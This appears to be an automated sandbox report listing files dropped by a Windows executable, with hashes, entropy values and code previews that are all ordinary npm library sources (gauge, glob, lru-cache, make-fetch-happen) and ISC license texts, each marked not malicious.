              File Type:ASCII text
              Category:dropped
              Size (bytes):616
              Entropy (8bit):4.664170599632696
              Encrypted:false
              SSDEEP:
              MD5:528E2CB56F65929AA4376E585005F1A4
              SHA1:04E38F90829460D150C24677F678BE9C59A1986D
              SHA-256:2957DC2045A462606DF224526D880FCC7A472BC992A74B0DB9B23BF1984A9B20
              SHA-512:C49EEE8427B3315EA6866F094C55DB240B6D7D889A520CC3FB0400ECD25D59C064E9C137FB004F657B03D2F21BE56C00FB7ABEF9E0EF2462D8B9AD75C112EB6D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var util = require('util')..var User = exports.User = function User (msg) {. var err = new Error(msg). Error.captureStackTrace(err, User). err.code = 'EGAUGE'. return err.}..exports.MissingTemplateValue = function MissingTemplateValue (item, values) {. var err = new User(util.format('Missing template value "%s"', item.type)). Error.captureStackTrace(err, MissingTemplateValue). err.template = item. err.values = values. return err.}..exports.Internal = function Internal (msg) {. var err = new Error(msg). Error.captureStackTrace(err, Internal). err.code = 'EGAUGEINTERNAL'. return err.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):99
              Entropy (8bit):4.361405751039892
              Encrypted:false
              SSDEEP:
              MD5:12BDBDDC59CAB41A8DAA15925D883576
              SHA1:C98472FFF9CA49B7DF18EB1FF15D41CB0D2AF64D
              SHA-256:BC77CC5732B948D7FE113B31FF78972D6EA336F8D15E8547542007657D41DC30
              SHA-512:087B2AA7B423B7F173096091B36CCE6269DF4D768AE80FE818044360114753D7F5D968AB8F1C0B3C8C130CBC45176AC7E6A9369325FFBAD3E6B89C43C39A71C2
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var colorSupport = require('color-support')..module.exports = colorSupport().hasBasic.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7288
              Entropy (8bit):4.8359655550246075
              Encrypted:false
              SSDEEP:
              MD5:CB0838FA4AEB0DC9E13A56083A1B6338
              SHA1:4E77C08EE7975035079A98B00F204D7D2DFD435B
              SHA-256:48DEB8AF788193AC8E9D6E120046BE2E0A8EDAAEC20DC5F46572C0171AEAC0FA
              SHA-512:B5988348FCEDACE238E693294539E30D90C06DA357424625FB868D31F1514390B18403F9A376EF343D93EACC70FD00C534290E9C9D2D2FE80BE7D1AFFE23B092
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var Plumbing = require('./plumbing.js').var hasUnicode = require('has-unicode').var hasColor = require('./has-color.js').var onExit = require('signal-exit').var defaultThemes = require('./themes').var setInterval = require('./set-interval.js').var process = require('./process.js').var setImmediate = require('./set-immediate')..module.exports = Gauge..function callWith (obj, method) {. return function () {. return method.call(obj). }.}..function Gauge (arg1, arg2) {. var options, writeTo. if (arg1 && arg1.write) {. writeTo = arg1. options = arg2 || {}. } else if (arg2 && arg2.write) {. writeTo = arg2. options = arg1 || {}. } else {. writeTo = process.stderr. options = arg1 || arg2 || {}. }.. this._status = {. spun: 0,. section: '',. subsection: '',. }. this._paused = false // are we paused for back pressure?. this._disabled = true // are all progress bar updates disabled?. this._showing = false // do we WANT the progress bar on scre
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):89
              Entropy (8bit):4.173406223573972
              Encrypted:false
              SSDEEP:
              MD5:337306F3FC6274ECD4F9E7C7CEEFFB1D
              SHA1:8710BC75E47006D96F52C5A8CE8AC224F3E2356D
              SHA-256:742BD2D12A7786E595955C8A846DBEFE88591DF39C2659491BDDADBB8ED7DAE6
              SHA-512:DDBB842E803E1F170ADF8EF41E209EB2CD0B857F2605E816EBEFAE3F4C9BC40F70A4FB1B32FBFEED04ED2465D8D19BE573A3958DF51DF7503817766A705A9DE4
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.// this exists so we can replace it during testing.module.exports = process.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1035
              Entropy (8bit):4.680932925750529
              Encrypted:false
              SSDEEP:
              MD5:AA35E2F28213533F809E8B5F9EECBEF9
              SHA1:3C6DC3B1D35C115D4E712647941B6223A54F4062
              SHA-256:E0BF26E14228CB79C8C763E345F0FD5B6DA71E4564E1229AD2B8C40124E1D16B
              SHA-512:817B2375DC4D57DE2367F9B0353896C6508FF377453D0CD639AF93A1D0D4123A5E7DF369339A68FB379A7876A21C990B7A55A1BAF835816A4362E13FD17E97D7
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var validate = require('aproba').var renderTemplate = require('./render-template.js').var wideTruncate = require('./wide-truncate').var stringWidth = require('string-width')..module.exports = function (theme, width, completed) {. validate('ONN', [theme, width, completed]). if (completed < 0) {. completed = 0. }. if (completed > 1) {. completed = 1. }. if (width <= 0) {. return ''. }. var sofar = Math.round(width * completed). var rest = width - sofar. var template = [. { type: 'complete', value: repeat(theme.complete, sofar), length: sofar },. { type: 'remaining', value: repeat(theme.remaining, rest), length: rest },. ]. return renderTemplate(width, template, theme).}..// lodash's way of repeating.function repeat (string, width) {. var result = ''. var n = width. do {. if (n % 2) {. result += string. }. n = Math.floor(n / 2). /* eslint no-self-assign: 0 */. string += string. } while (n && stringWidth(result) < width).. re
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):139
              Entropy (8bit):4.4913549644851685
              Encrypted:false
              SSDEEP:
              MD5:E5CB7C218A0F9437498FA48539DD3DD2
              SHA1:0EE3511B6DAC6BD821FF613BC07FEAFE664CCF3F
              SHA-256:90DBB2E127D9B971731B2094B2516A463243E4074367DD4129FE2849EF598514
              SHA-512:D712323110DE5977513F9BCFD945BBB3310A4C45DAC8CAC949A27F7E99F20E0A1A63E200E8BFDC56AA756E3FC670724E953521CBC6C3A2A2E06AFADCF845DCD1
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var process = require('./process').try {. module.exports = setImmediate.} catch (ex) {. module.exports = process.nextTick.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):105
              Entropy (8bit):4.294394152450316
              Encrypted:false
              SSDEEP:
              MD5:35D56B687E0E510544D77FB01F350406
              SHA1:B2A1975A8A0D714909FE8D5056804700FEFD11D3
              SHA-256:4DDB202944FD4E556EDC68107B1A1F33DD25F1910876D2BF04EB5A58AE060C9D
              SHA-512:D1A19D4AA31DBD4B1793CDFD9B388004E948636C86CAA48120E49A252F3922F4C611C9EC70FA3AB043042C4797C89248607A627025EEA1483C2327751F880B95
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..module.exports = function spin (spinstr, spun) {. return spinstr[spun % spinstr.length].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1977
              Entropy (8bit):4.632874242075869
              Encrypted:false
              SSDEEP:
              MD5:F0CA63BE83F97FAD471ABE7E2BC09754
              SHA1:9BB0E93DC258FA396A9CD84870C477465C6A6225
              SHA-256:DE035282BF53B20E4A2B79A734AD9088E10D0B34BBF0D40571B138D0E144CA55
              SHA-512:78B37F1E2058770938495F78012EB4328544F0B0F016D12A16F5261190C575C73380A6856491B6CEACEEAC95CA0DD9C81716436BB44FACBAA3409D91D2BA08AB
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var stringWidth = require('string-width')..module.exports = TemplateItem..function isPercent (num) {. if (typeof num !== 'string') {. return false. }. return num.slice(-1) === '%'.}..function percent (num) {. return Number(num.slice(0, -1)) / 100.}..function TemplateItem (values, outputLength) {. this.overallOutputLength = outputLength. this.finished = false. this.type = null. this.value = null. this.length = null. this.maxLength = null. this.minLength = null. this.kerning = null. this.align = 'left'. this.padLeft = 0. this.padRight = 0. this.index = null. this.first = null. this.last = null. if (typeof values === 'string') {. this.value = values. } else {. for (var prop in values) {. this[prop] = values[prop]. }. }. // Realize percents. if (isPercent(this.length)) {. this.length = Math.round(this.overallOutputLength * percent(this.length)). }. if (isPercent(this.minLength)) {. this.minLength = Math.round(this.overallOutputLe
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3720
              Entropy (8bit):4.834589957134494
              Encrypted:false
              SSDEEP:
              MD5:10BC47F2CCADA730A0D544CAA1BFB745
              SHA1:36D09FBC9383EAFBEC496B336CEF184ECA0DBF13
              SHA-256:F7B13A94BBC5E1796F407F6951C452192A7084663B467E735F2C9F9957292409
              SHA-512:FDDFA21B91719DF0A69A02313502AA69EA894B2F07DC6CB1A1B8CA637BE2B423C24E62DD11F907D859C1CBB1EB1CEA7A9FEE0F7954F8164EBE98F4A154E2B491
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..module.exports = function () {. return ThemeSetProto.newThemeSet().}..var ThemeSetProto = {}..ThemeSetProto.baseTheme = require('./base-theme.js')..ThemeSetProto.newTheme = function (parent, theme) {. if (!theme) {. theme = parent. parent = this.baseTheme. }. return Object.assign({}, parent, theme).}..ThemeSetProto.getThemeNames = function () {. return Object.keys(this.themes).}..ThemeSetProto.addTheme = function (name, parent, theme) {. this.themes[name] = this.newTheme(parent, theme).}..ThemeSetProto.addToAllThemes = function (theme) {. var themes = this.themes. Object.keys(themes).forEach(function (name) {. Object.assign(themes[name], theme). }). Object.assign(this.baseTheme, theme).}..ThemeSetProto.getTheme = function (name) {. if (!this.themes[name]) {. throw this.newMissingThemeError(name). }. return this.themes[name].}..ThemeSetProto.setDefault = function (opts, name) {. if (name == null) {. name = opts. opts = {}. }. var platform
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):1667
              Entropy (8bit):4.953184168053932
              Encrypted:false
              SSDEEP:
              MD5:EFE93779C76FFF0CB66101238DFF30E6
              SHA1:0531C3C5B353BAAB97BD347354566AF214A214A4
              SHA-256:6A2DA219CFC714FFAACDE2AFB26A5DC3025BAA9F984FB1191E69A2E0E0C502D8
              SHA-512:788E9D371A0824953F7E2CB4B25B7700E699184118FF01D5EE074BB3BB68B7E062781425F5205A8CAEAEDDA8AA6CA4FBD3D94EB1F1FFCC8E1F4AD7AE76457254
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var color = require('console-control-strings').color.var ThemeSet = require('./theme-set.js')..var themes = module.exports = new ThemeSet()..themes.addTheme('ASCII', {. preProgressbar: '[',. postProgressbar: ']',. progressbarTheme: {. complete: '#',. remaining: '.',. },. activityIndicatorTheme: '-\\|/',. preSubsection: '>',.})..themes.addTheme('colorASCII', themes.getTheme('ASCII'), {. progressbarTheme: {. preComplete: color('bgBrightWhite', 'brightWhite'),. complete: '#',. postComplete: color('reset'),. preRemaining: color('bgBrightBlack', 'brightBlack'),. remaining: '.',. postRemaining: color('reset'),. },.})..themes.addTheme('brailleSpinner', {. preProgressbar: '(',. postProgressbar: ')',. progressbarTheme: {. complete: '#',. remaining: '.',. },. activityIndicatorTheme: '..........',. preSubsection: '>',.})..themes.addTheme('colorBrailleSpinner', themes.getTheme('brailleSpinner'), {. progressbarTheme: {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1603
              Entropy (8bit):4.7226081367755
              Encrypted:false
              SSDEEP:
              MD5:CAA52D5625D9B0E23F9B5FCA802038E6
              SHA1:4FCF177B51DD6AC24EFCE2242B42E97148785E7D
              SHA-256:9035270ED26179AE66EBB75F50A46B3C919ED6B0536350CE5130B72077B59DE5
              SHA-512:52EEE183B92B2EED86183FD16046D831C2EE74CD0F654D2CE33099C671D14A554A57C1C0F20728D011B0713CA4318AB90D1254B52B0AABCCC740B18646D726F9
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "gauge",. "version": "4.0.4",. "description": "A terminal based horizontal gauge",. "main": "lib",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "snap": "tap",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/gauge.git". },. "keywords": [. "progressbar",. "progress",. "gauge". ],. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/gauge/issues". },. "homepage": "https://github.com/npm/gauge",. "dependencies": {. "aproba": "^1.0.3 || ^2.0.0",. "color-support": "^1.1.3",. "console-control-strings": "^1.1.0",. "has-unicode": "^2.0.1",. "signal-exit": "^3.0.7",. "string
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):976
              Entropy (8bit):5.191655754318653
              Encrypted:false
              SSDEEP:
              MD5:C727D36F28F2762B1011DD483AA1A191
              SHA1:35325CE350B66F071997AC573A97ECA7E2E4F558
              SHA-256:6236FA0B88A4A0CCE3DDA0367979491B2052B3C8D6B1C10B3668DE083E86A7F0
              SHA-512:CD94F54627D93EA0C4BEC5129D70B0A0453979BB9F527226312DD63AFF58C62D8C5739990A476A60527C4C34FEA23F7AA1AABB6BC006C40219222DBF04C8BFB0
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) Isaac Z. Schlueter and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE...## Glob Logo..Glob's logo created by Tanya Brassie <http://tanyabrassie.com/>, licensed.under a Creative Commons Attribution-ShareAlike 4.0 International License.https://creativecommons.org/licenses/by-sa/4.0/.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12020
              Entropy (8bit):4.705750226176709
              Encrypted:false
              SSDEEP:
              MD5:04C59A035F41D0EC358F2A35079B4440
              SHA1:82B1C855E4BFCA820ECBED219649CD174B0C2F62
              SHA-256:0F61227F4B55297F1AD16798C53E6A6DD55D633856F153133716413B7C5F61AD
              SHA-512:2DB70C0194A06647B424F0B7209AFE7751633ED2EA1FF5C24969C41A2D5951E9D013C678BACC1FB300919D18F3A788DC5901F5776D1B620244A1C81FC4705621
              Malicious:false
              Reputation:unknown
              Preview:module.exports = globSync.globSync.GlobSync = GlobSync..var rp = require('fs.realpath').var minimatch = require('minimatch').var Minimatch = minimatch.Minimatch.var Glob = require('./glob.js').Glob.var util = require('util').var path = require('path').var assert = require('assert').var isAbsolute = require('path-is-absolute').var common = require('./common.js').var setopts = common.setopts.var ownProp = common.ownProp.var childrenIgnored = common.childrenIgnored.var isIgnored = common.isIgnored..function globSync (pattern, options) {. if (typeof options === 'function' || arguments.length === 3). throw new TypeError('callback provided to sync glob\n'+. 'See: https://github.com/isaacs/node-glob/issues/167').. return new GlobSync(pattern, options).found.}..function GlobSync (pattern, options) {. if (!pattern). throw new Error('must provide pattern').. if (typeof options === 'function' || arguments.length === 3). throw new TypeError('callback provided to
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):33933
              Entropy (8bit):4.53110539231193
              Encrypted:false
              SSDEEP:
              MD5:BDAD1024C21B5855277AD8C8896B2A79
              SHA1:7424326D137F530CCF17AA06B9E78950021F2ABF
              SHA-256:B5E2C99840BAB65DA50361F5D07352CBCBD600B4CA0B97CAB11303BE9D0DA99E
              SHA-512:DD3767F5478195FF333B22EC73ACEBB21933A1061F366C1A5B7B8D74947D59832680AFE8AB4F3B30877F3B3C7F53308E2A37B09A3F6F1542D9A61F43FFF0C1F8
              Malicious:false
              Reputation:unknown
              Preview:const perf =. typeof performance === 'object' &&. performance &&. typeof performance.now === 'function'. ? performance. : Date..const hasAbortController = typeof AbortController === 'function'..// minimal backwards-compatibility polyfill.// this doesn't have nearly all the checks and whatnot that.// actual AbortController/Signal has, but it's enough for.// our purposes, and if used properly, behaves the same..const AC = hasAbortController. ? AbortController. : class AbortController {. constructor() {. this.signal = new AS(). }. abort(reason = new Error('This operation was aborted')) {. this.signal.reason = this.signal.reason || reason. this.signal.aborted = true. this.signal.dispatchEvent({. type: 'abort',. target: this.signal,. }). }. }..const hasAbortSignal = typeof AbortSignal === 'function'.// Some polyfills put this on the AC class, not global.const hasACAbortSignal = typeof AC.AbortSignal === '
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):33931
              Entropy (8bit):4.530969342510064
              Encrypted:false
              SSDEEP:
              MD5:B18DC45F3A5CD91406853B0C0AC9BFDA
              SHA1:E62140DB3963D31B2D680AB088CFC278758434C3
              SHA-256:8794030E0A4E683B50C5707ADC710010F4042B893AF8C88BC065FFBB5910E053
              SHA-512:DC4B839B5881E363D4E8290497A0ED01E48A3694316E0BCDAF9245E058612EE0C8554FFBE7A5EBA0D43E6F853ADF99055CDCB6BC65539C08E527630CE78441A1
              Malicious:false
              Reputation:unknown
              Preview:const perf =. typeof performance === 'object' &&. performance &&. typeof performance.now === 'function'. ? performance. : Date..const hasAbortController = typeof AbortController === 'function'..// minimal backwards-compatibility polyfill.// this doesn't have nearly all the checks and whatnot that.// actual AbortController/Signal has, but it's enough for.// our purposes, and if used properly, behaves the same..const AC = hasAbortController. ? AbortController. : class AbortController {. constructor() {. this.signal = new AS(). }. abort(reason = new Error('This operation was aborted')) {. this.signal.reason = this.signal.reason || reason. this.signal.aborted = true. this.signal.dispatchEvent({. type: 'abort',. target: this.signal,. }). }. }..const hasAbortSignal = typeof AbortSignal === 'function'.// Some polyfills put this on the AC class, not global.const hasACAbortSignal = typeof AC.AbortSignal === '
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2133
              Entropy (8bit):4.593915712988306
              Encrypted:false
              SSDEEP:
              MD5:EF12EBE29C761F0FC4A39614931EB758
              SHA1:E44EC27349915D16C400B9D619C86770972E40A2
              SHA-256:08BDB4E1FE6F5BFBDC0183D3AD6086DC22CADE3CE0D6466C6116584387AD9550
              SHA-512:817574C56F7DD3081C79832BABB26F5134EB91EE96A4032163B404C94E0874AB50A9BCF1BF2289A220A75A1D39FE1B8B6EF166C9AE62338632E321A2A4529560
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "lru-cache",. "description": "A cache object that deletes the least-recently-used items.",. "version": "7.18.3",. "author": "Isaac Z. Schlueter <i@izs.me>",. "keywords": [. "mru",. "lru",. "cache". ],. "sideEffects": false,. "scripts": {. "build": "npm run prepare",. "pretest": "npm run prepare",. "presnap": "npm run prepare",. "prepare": "node ./scripts/transpile-to-esm.js",. "size": "size-limit",. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags",. "format": "prettier --write .",. "typedoc": "typedoc ./index.d.ts". },. "type": "commonjs",. "main": "./index.js",. "module": "./index.mjs",. "types": "./index.d.ts",. "exports": {. ".": {. "import": {. "types": "./index.d.ts",. "default": "./index.mjs". },. "require": {. "types": "./index.d.ts",. "default": "./index.js". }. },.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):765
              Entropy (8bit):5.041148808279788
              Encrypted:false
              SSDEEP:
              MD5:333CD0E0A8599F78B656EE1DF3A44F97
              SHA1:E2586BB4FF1BAA4F38B7F82C74D6273233AE9EA5
              SHA-256:A806E21000EE60CFD64A6F1416F29C7552B4834701974E86C0156F99C0CDD806
              SHA-512:2B78EA954A591BBD9B39A09B301BFB11400033E83D1E4F10305D09D7E1E625C7863BA02C1BB81910EF3A8F2E28B0F66793DCF772F30A82AFC3150820F8612020
              Malicious:false
              Reputation:unknown
              Preview:ISC License..Copyright 2017-2022 (c) npm, Inc...Permission to use, copy, modify, and/or distribute this software for.any purpose with or without fee is hereby granted, provided that the.above copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE COPYRIGHT HOLDER DISCLAIMS.ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE.COPYRIGHT HOLDER BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR.CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS.OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE.OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE.USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5877
              Entropy (8bit):4.920355350712633
              Encrypted:false
              SSDEEP:
              MD5:9A12FE0935A2712DA3D672A9B50F7ABD
              SHA1:83438D29780C8D28B099D5E101914A085E68598B
              SHA-256:93EF693098086B6DA7570DF667445F3D9E7B40A707FC1C827E38809ACCF73AE2
              SHA-512:4F0C5873B92923C180C0E7E0149BB0E4F2C4A1DF61DE816601EC8A294616106C2FCD89EEBA4C57A315A525A05E3878CBCB354C98DC61F0EE775377E18A3D25F6
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const LRU = require('lru-cache').const url = require('url').const isLambda = require('is-lambda').const dns = require('./dns.js')..const AGENT_CACHE = new LRU({ max: 50 }).const HttpAgent = require('agentkeepalive').const HttpsAgent = HttpAgent.HttpsAgent..module.exports = getAgent..const getAgentTimeout = timeout =>. typeof timeout !== 'number' || !timeout ? 0 : timeout + 1..const getMaxSockets = maxSockets => maxSockets || 15..function getAgent (uri, opts) {. const parsedUri = new url.URL(typeof uri === 'string' ? uri : uri.url). const isHttps = parsedUri.protocol === 'https:'. const pxuri = getProxyUri(parsedUri.href, opts).. // If opts.timeout is zero, set the agentTimeout to zero as well. A timeout. // of zero disables the timeout behavior (OS limits still apply). Else, if. // opts.timeout is a non-zero value, set it to timeout + 1, to ensure that. // the node-fetch-npm timeout will always fire first, giving us more. // consistent errors.. const agentTimeout
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1792
              Entropy (8bit):4.5396551016217765
              Encrypted:false
              SSDEEP:
              MD5:0002410812B04D172758BA0D9F6A954A
              SHA1:E04D508CF8887EBCFD9EE8FAEB3622CAFA3DFAC1
              SHA-256:B9A47E604B9D6EC9211E5129636BA7366C408C074EA1D4B8C859CF221C347071
              SHA-512:A81F216B6FBF69D144866529D8BB4E112FBDC7682F991E99A005F16F8CCD0185EF37C721198CFBE40657BB83083548C877BEB9CD8354F15B219A71D13C359707
              Malicious:false
              Reputation:unknown
              Preview:const { NotCachedError } = require('./errors.js').const CacheEntry = require('./entry.js').const remote = require('../remote.js')..// do whatever is necessary to get a Response and return it.const cacheFetch = async (request, options) => {. // try to find a cached entry that satisfies this request. const entry = await CacheEntry.find(request, options). if (!entry) {. // no cached result, if the cache mode is 'only-if-cached' that's a failure. if (options.cache === 'only-if-cached') {. throw new NotCachedError(request.url). }.. // otherwise, we make a request, store it and return it. const response = await remote(request, options). const newEntry = new CacheEntry({ request, response, options }). return newEntry.store('miss'). }.. // we have a cached response that satisfies this request, however if the cache. // mode is 'no-cache' then we send the revalidation request no matter what. if (options.cache === 'no-cache') {. return entry.revalidate(request,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1293
              Entropy (8bit):4.657982331271299
              Encrypted:false
              SSDEEP:
              MD5:2EA3AB685CF2549CA1C32568F7BEF148
              SHA1:C88E2E4488117CD191C301B3C954D32BF35AF845
              SHA-256:2CD50EB4C87B491DC2155B986E611D0C3FCF08F17E2B019DC5A59B976BCFA20F
              SHA-512:1CB0E8039A4CE538BFC89F60C06295BD3FD658BFB0AB53C8350B46C9316200AC0BCF4B49DFF7DDAC3207B46BB6D6E0AF08DE2BFA2178FA0883403B9C640F3AE0
              Malicious:false
              Reputation:unknown
              Preview:const LRUCache = require('lru-cache').const dns = require('dns')..const defaultOptions = exports.defaultOptions = {. family: undefined,. hints: dns.ADDRCONFIG,. all: false,. verbatim: undefined,.}..const lookupCache = exports.lookupCache = new LRUCache({ max: 50 })..// this is a factory so that each request can have its own opts (i.e. ttl).// while still sharing the cache across all requests.exports.getLookup = (dnsOptions) => {. return (hostname, options, callback) => {. if (typeof options === 'function') {. callback = options. options = null. } else if (typeof options === 'number') {. options = { family: options }. }.. options = { ...defaultOptions, ...options }.. const key = JSON.stringify({. hostname,. family: options.family,. hints: options.hints,. all: options.all,. verbatim: options.verbatim,. }).. if (lookupCache.has(key)) {. const [address, family] = lookupCache.get(key). process.nextTick(callback, nul
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3947
              Entropy (8bit):4.89785509445456
              Encrypted:false
              SSDEEP:
              MD5:D81220809EFF3DA87281553259FC7EBD
              SHA1:5A0BCD13EF419A3A8C961A964CF4CD4DE6D256E7
              SHA-256:7D57BFD656A6AE2A53738FB3F25365D074D9CB7364794005BC70317FF2BF81E8
              SHA-512:652356C5546010794DB0A3A0FBA3F746428B886BE7B33A0AC7E96798C0EB0E39FD46CF121584890E04D3CF48220D50196F8E0C321C46F244B696C1503207E380
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { FetchError, Request, isRedirect } = require('minipass-fetch').const url = require('url')..const CachePolicy = require('./cache/policy.js').const cache = require('./cache/index.js').const remote = require('./remote.js')..// given a Request, a Response and user options.// return true if the response is a redirect that.// can be followed. we throw errors that will result.// in the fetch being rejected if the redirect is.// possible but invalid for some reason.const canFollowRedirect = (request, response, options) => {. if (!isRedirect(response.status)) {. return false. }.. if (options.redirect === 'manual') {. return false. }.. if (options.redirect === 'error') {. throw new FetchError(`redirect mode is set to error: ${request.url}`,. 'no-redirect', { code: 'ENOREDIRECT' }). }.. if (!response.headers.has('location')) {. throw new FetchError(`redirect location header missing for: ${request.url}`,. 'no-location', { code: 'EINVALIDREDIRECT' }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1114
              Entropy (8bit):4.497137454660423
              Encrypted:false
              SSDEEP:
              MD5:13FE7E2C674A023520E681ADC0B4E6C3
              SHA1:C8036D2CE4322F025E9ABDFC25A84A9DF7DB1D99
              SHA-256:082BB7C9C7F020C816C2582FE436C992B9851E0727339723337B580D6F6C1707
              SHA-512:9A47DFC27A41C69C9A0D77396FA2B87DAA95CD5A6941B4C6877D8BF7E0368C624530C6A0E7EE67125E0D4632EE25A171EAE41506EE09989AEF6286834CC31C24
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const MinipassPipeline = require('minipass-pipeline')..class CachingMinipassPipeline extends MinipassPipeline {. #events = []. #data = new Map().. constructor (opts, ...streams) {. // CRITICAL: do NOT pass the streams to the call to super(), this will start. // the flow of data and potentially cause the events we need to catch to emit. // before we've finished our own setup. instead we call super() with no args,. // finish our setup, and then push the streams into ourselves to start the. // data flow. super(). this.#events = opts.events.. /* istanbul ignore next - coverage disabled because this is pointless to test here */. if (streams.length) {. this.push(...streams). }. }.. on (event, handler) {. if (this.#events.includes(event) && this.#data.has(event)) {. return handler(...this.#data.get(event)). }.. return super.on(event, handler). }.. emit (event, ...data) {. if (this.#events.includes(event)) {. this.#d
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4119
              Entropy (8bit):4.7347894504778525
              Encrypted:false
              SSDEEP:
              MD5:9DDD121AAB843F0FD6277CEBCF125B53
              SHA1:8BE26920B1C65C584E18226F09068E39BCDC9051
              SHA-256:AA37A5B60EC5E0D68BB87A1548E557E4B3D41C13F4785333AC432A5E0C4DECD3
              SHA-512:ACBCA12F7CCC1C723FD4BC37186FBB3CDDC02C2B3C6BEF2E4D20CF4CCB110217E92A2668CC3A8A8ACE53DBD40A36977F19824ABF6F46795FE8894F107695E77D
              Malicious:false
              Reputation:unknown
              Preview:const { Minipass } = require('minipass').const fetch = require('minipass-fetch').const promiseRetry = require('promise-retry').const ssri = require('ssri')..const CachingMinipassPipeline = require('./pipeline.js').const getAgent = require('./agent.js').const pkg = require('../package.json')..const USER_AGENT = `${pkg.name}/${pkg.version} (+https://npm.im/${pkg.name})`..const RETRY_ERRORS = [. 'ECONNRESET', // remote socket closed on us. 'ECONNREFUSED', // remote host refused to open connection. 'EADDRINUSE', // failed to bind to a local port (proxy?). 'ETIMEDOUT', // someone in the transaction is WAY TOO SLOW. 'ERR_SOCKET_TIMEOUT', // same as above, but this one comes from agentkeepalive. // Known codes we do NOT retry on:. // ENOTFOUND (getaddrinfo failure. Either bad hostname, or offline).]..const RETRY_TYPES = [. 'request-timeout',.]..// make a request directly to the remote source,.// retrying certain classes of errors as well as.// following redirects (through the cache if
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
